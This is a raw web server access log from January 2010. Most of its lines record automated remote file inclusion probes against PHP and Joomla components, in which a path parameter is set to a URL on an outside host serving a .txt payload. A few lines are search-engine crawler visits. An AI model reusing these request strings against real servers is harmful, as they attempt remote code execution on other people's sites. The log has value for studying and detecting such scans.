203.130.149.241 - - [17/Jan/2010:04:29:07 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.130.149.241 - - [17/Jan/2010:04:29:07 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
64.62.128.254 - - [17/Jan/2010:04:29:07 -0500] "GET /logs/access_log.Q109072200//skin/ggambo7002_board/write.php?dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:04:29:15 -0500] "GET /logs/error_log.Q109111200%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:04:29:18 -0500] "GET /logs/error_log.Q109060300%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
203.130.149.241 - - [17/Jan/2010:04:29:20 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
203.130.149.241 - - [17/Jan/2010:04:29:20 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.130.149.241 - - [17/Jan/2010:04:29:23 -0500] "GET /logs/access_log.Q109080100//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:04:29:32 -0500] "GET /logs/access_log.Q109081600%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
203.130.149.241 - - [17/Jan/2010:04:29:37 -0500] "GET /logs/access_log.Q109080100%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:04:29:53 -0500] "GET /logs/access_log.Q109060700%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:30:00 -0500] "GET ///administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:30:00 -0500] "GET /logs/error_log.Q109052900%20%20///administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:30:00 -0500] "GET /logs///administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:30:00 -0500] "GET /logs/access_log.Q109060100%20%20///administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:04:30:08 -0500] "GET /logs/error_log.Q109051700%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
209.92.156.53 - - [17/Jan/2010:04:30:46 -0500] "GET /logs/access_log.Q109072900%20%20//becommunity/community/index.php?pageurl=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:04:30:58 -0500] "GET /logs/access_log.Q109051000%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:31:06 -0500] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:31:06 -0500] "GET /logs/access_log.Q109061400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:31:06 -0500] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:04:31:22 -0500] "GET /logs/error_log.Q109112400%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
209.92.156.53 - - [17/Jan/2010:04:31:32 -0500] "GET /logs/access_log.Q109101700%20%20//becommunity/community/index.php?pageurl=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:04:31:32 -0500] "GET /logs/error_log.Q109112200%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:31:33 -0500] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:31:36 -0500] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:31:36 -0500] "GET /logs/access_log.Q109061400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:04:31:38 -0500] "GET /logs/access_log.Q109060100%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
66.249.68.142 - - [17/Jan/2010:04:31:41 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L014C325B12229800199C07M+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.16.230.82 - - [17/Jan/2010:04:31:41 -0500] "GET ///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:31:41 -0500] "GET /logs///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:31:41 -0500] "GET /logs/access_log.Q109061000%20%20///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 304 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:31:48 -0500] "GET /logs/access_log.Q109061400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:31:48 -0500] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:31:53 -0500] "GET /logs/access_log.Q109110100%20%20///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 304 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:31:54 -0500] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
95.108.128.242 - - [17/Jan/2010:04:31:56 -0500] "GET /logs/error_log.Q109081200 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
203.124.149.168 - - [17/Jan/2010:04:32:12 -0500] "GET /logs/access_log.Q109100700%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:04:32:27 -0500] "GET /logs/access_log.Q109070700%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:32:30 -0500] "GET /logs/access_log.Q109061400%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:32:30 -0500] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:32:30 -0500] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:32:36 -0500] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:32:36 -0500] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:32:38 -0500] "GET /logs/access_log.Q109061400%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
203.130.149.241 - - [17/Jan/2010:04:32:42 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
203.130.149.241 - - [17/Jan/2010:04:32:42 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
203.130.149.241 - - [17/Jan/2010:04:32:42 -0500] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
203.130.149.241 - - [17/Jan/2010:04:32:49 -0500] "GET /logs/access_log.Q109083000//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:32:52 -0500] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:32:52 -0500] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:32:52 -0500] "GET /logs/access_log.Q109061400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
203.130.149.241 - - [17/Jan/2010:04:33:03 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
203.130.149.241 - - [17/Jan/2010:04:33:03 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
203.130.149.241 - - [17/Jan/2010:04:33:03 -0500] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
203.130.149.241 - - [17/Jan/2010:04:33:07 -0500] "GET /logs/access_log.Q109083000%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
115.68.2.144 - - [17/Jan/2010:04:33:42 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
115.68.2.144 - - [17/Jan/2010:04:33:42 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 200 34521 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
66.249.68.142 - - [17/Jan/2010:04:33:52 -0500] "GET /images/over-index_membranes.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
203.237.238.234 - - [17/Jan/2010:04:34:47 -0500] "GET //appserv/main.php?appserv_root=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
203.237.238.234 - - [17/Jan/2010:04:34:47 -0500] "GET /logs/error_log.Q109120900//appserv/main.php?appserv_root=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
203.237.238.234 - - [17/Jan/2010:04:34:47 -0500] "GET /logs//appserv/main.php?appserv_root=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
203.237.238.234 - - [17/Jan/2010:04:34:51 -0500] "GET /logs/error_log.Q109050700//appserv/main.php?appserv_root=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:04:34:17 -0500] "GET /logs/access_log.Q109090800 HTTP/1.0" 200 5714765 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.111.176.66 - - [17/Jan/2010:04:35:29 -0500] "GET /logs/access_log.Q109121100//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
89.111.176.66 - - [17/Jan/2010:04:35:29 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
89.111.176.66 - - [17/Jan/2010:04:35:29 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
89.111.176.66 - - [17/Jan/2010:04:35:55 -0500] "GET /logs/access_log.Q109060600//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:04:35:59 -0500] "GET /logs/access_log.Q109091200%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
220.181.7.130 - - [17/Jan/2010:04:36:10 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
74.55.15.194 - - [17/Jan/2010:04:36:58 -0500] "GET /logs/access_log.Q109082500%20%20/t/index.php%20//component/option,com_virtuemart/page…/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 326 "-" "Mozilla/5.0"
74.55.15.194 - - [17/Jan/2010:04:36:58 -0500] "GET /logs/t/index.php%20//component/option,com_virtuemart/page…/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
74.55.15.194 - - [17/Jan/2010:04:36:58 -0500] "GET /t/index.php%20//component/option,com_virtuemart/page…/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:37:00 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:37:00 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:37:00 -0500] "GET /logs/access_log.Q109110800%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:37:01 -0500] "GET /logs/access_log.Q109071700%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.55.15.194 - - [17/Jan/2010:04:37:07 -0500] "GET /logs/access_log.Q109101800%20%20/t/index.php%20//component/option,com_virtuemart/page…/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 326 "-" "Mozilla/5.0"
74.55.15.194 - - [17/Jan/2010:04:37:07 -0500] "GET /logs/error_log.Q109101800%20%20/t/index.php%20//component/option,com_virtuemart/page…/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 325 "-" "Mozilla/5.0"
74.55.15.194 - - [17/Jan/2010:04:37:11 -0500] "GET /logs/access_log.Q109122300%20%20/t/index.php%20//component/option,com_virtuemart/page…/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 326 "-" "Mozilla/5.0"
74.55.15.194 - - [17/Jan/2010:04:37:11 -0500] "GET /logs/error_log.Q109081900%20%20/t/index.php%20//component/option,com_virtuemart/page…/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 325 "-" "Mozilla/5.0"
74.55.15.194 - - [17/Jan/2010:04:37:11 -0500] "GET /logs/error_log.Q109082500%20%20/t/index.php%20//component/option,com_virtuemart/page…/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 325 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:37:13 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:37:13 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:37:13 -0500] "GET /logs/access_log.Q109110800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:37:13 -0500] "GET /logs/access_log.Q109071700//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.92.156.53 - - [17/Jan/2010:04:37:14 -0500] "GET //becommunity/community/index.php?pageurl=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
209.92.156.53 - - [17/Jan/2010:04:37:14 -0500] "GET /logs//becommunity/community/index.php?pageurl=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.92.156.53 - - [17/Jan/2010:04:37:14 -0500] "GET /logs/access_log.Q109072900%20%20//becommunity/community/index.php?pageurl=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.92.156.53 - - [17/Jan/2010:04:37:19 -0500] "GET /logs/access_log.Q109101700%20%20//becommunity/community/index.php?pageurl=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
74.55.15.194 - - [17/Jan/2010:04:37:19 -0500] "GET /logs/access_log.Q109082000%20%20/t/index.php%20//component/option,com_virtuemart/page…/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 326 "-" "Mozilla/5.0"
74.55.15.194 - - [17/Jan/2010:04:37:19 -0500] "GET /logs/access_log.Q109080700%20%20/t/index.php%20//component/option,com_virtuemart/page…/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 326 "-" "Mozilla/5.0"
74.55.15.194 - - [17/Jan/2010:04:37:19 -0500] "GET /logs/error_log.Q109082000%20%20/t/index.php%20//component/option,com_virtuemart/page…/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 325 "-" "Mozilla/5.0"
209.92.156.53 - - [17/Jan/2010:04:37:20 -0500] "GET //becommunity/community/index.php?pageurl=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
209.92.156.53 - - [17/Jan/2010:04:37:20 -0500] "GET /logs//becommunity/community/index.php?pageurl=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.92.156.53 - - [17/Jan/2010:04:37:20 -0500] "GET /logs/access_log.Q109072900%20%20//becommunity/community/index.php?pageurl=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
67.195.111.35 - - [17/Jan/2010:04:37:23 -0500] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.111.35 - - [17/Jan/2010:04:37:23 -0500] "GET /logs/ HTTP/1.0" 200 34516 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.92.156.53 - - [17/Jan/2010:04:37:26 -0500] "GET /logs/access_log.Q109101700%20%20//becommunity/community/index.php?pageurl=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
74.55.15.194 - - [17/Jan/2010:04:37:26 -0500] "GET /logs/access_log.Q109061400%20%20/t/index.php%20//component/option,com_virtuemart/page…/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 326 "-" "Mozilla/5.0"
